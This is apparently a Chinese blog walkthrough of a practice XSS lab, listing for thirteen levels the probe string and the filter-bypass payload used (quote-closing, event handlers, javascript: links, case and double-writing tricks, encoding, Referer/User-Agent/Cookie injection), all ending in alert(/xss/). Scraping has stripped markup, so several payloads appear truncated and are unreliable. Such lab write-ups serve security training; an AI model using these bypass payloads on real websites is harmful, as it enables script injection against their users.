XSS入门 XSS Challenges

level1(直接注入)


image-20230825114847371

XSS入门 XSS Challenges_第1张图片

level2(双引号闭合标签)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第2张图片
在这里插入图片描述

发现<>"被转换,构造新的语句
">

XSS入门 XSS Challenges_第3张图片

level3(单引号闭合标签+html事件)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第4张图片

XSS入门 XSS Challenges_第5张图片

存在单引号,增加新的事件,构造新的语句:
'onmouseover='alert(/xss/)'

XSS入门 XSS Challenges_第6张图片

level4(双引号闭合标签+html事件)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第7张图片
XSS入门 XSS Challenges_第8张图片

只有双引号,没有被转换,构造新的语句:
"onmouseover='alert(/xss/)'

XSS入门 XSS Challenges_第9张图片

level5(双引号闭合标签+伪协议)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第10张图片

对ScRiPt和on有过滤,不能使用事件,可以使用a标签
">click me

XSS入门 XSS Challenges_第11张图片

level6(大小写转换)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

在这里插入图片描述

尝试过后,修改语句:
">click me

XSS入门 XSS Challenges_第12张图片

level7(双写)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

在这里插入图片描述

双写;修改语句:
">alert(/xss/)

XSS入门 XSS Challenges_第13张图片

level8(编码)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第14张图片

可以看出大小写,双引号,也过滤了,前面关,用过的也都不起作用。
看到有个a标签,我们可以考虑伪协议 + 字符编码。
payload:javascript:alert(/xss/)

在这里插入图片描述

对r、i进行编码:
javascript:alert(/xss/)

XSS入门 XSS Challenges_第15张图片

level9(http://)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

在这里插入图片描述

javascript:alert('xsshttp://')

XSS入门 XSS Challenges_第16张图片

XSS入门 XSS Challenges_第17张图片

XSS入门 XSS Challenges_第18张图片

level10(type=“text”)

测试
IPT>OonN'"\/(hrHRefEF)IPT>

XSS入门 XSS Challenges_第19张图片

其类型为hidden,则需要重新上传,type="text",通过尝试,t_sort能够在页面显示
t_link
t_history
t_sort
t_sort=1" type="text"

XSS入门 XSS Challenges_第20张图片

"onmouseover='alert(/xss/)' type="text"

XSS入门 XSS Challenges_第21张图片

level11(referer)

查看页面代码和源码,发现可以通过referer注入命令

XSS入门 XSS Challenges_第22张图片

XSS入门 XSS Challenges_第23张图片

hackbar获取url,选择referer注入
click me!" type="button" onclick="alert(/xss/)

XSS入门 XSS Challenges_第24张图片

XSS入门 XSS Challenges_第25张图片

level12(user-agent)

查看页面代码和源码,发现可以通过user-agent注入命令

在这里插入图片描述

XSS入门 XSS Challenges_第26张图片

hackbar获取url,选择user-agent注入
click me!" type="button" onclick="alert(/xss/)

XSS入门 XSS Challenges_第27张图片

XSS入门 XSS Challenges_第28张图片

level13(cookie)

查看页面代码和源码,发现可以通过cookie注入命令

XSS入门 XSS Challenges_第29张图片

XSS入门 XSS Challenges_第30张图片

hackbar获取url,选择cookie注入
user=click me!" type="button" onclick="alert(/xss/)

XSS入门 XSS Challenges_第31张图片

XSS入门 XSS Challenges_第32张图片

你可能感兴趣的:(靶场,xss,安全)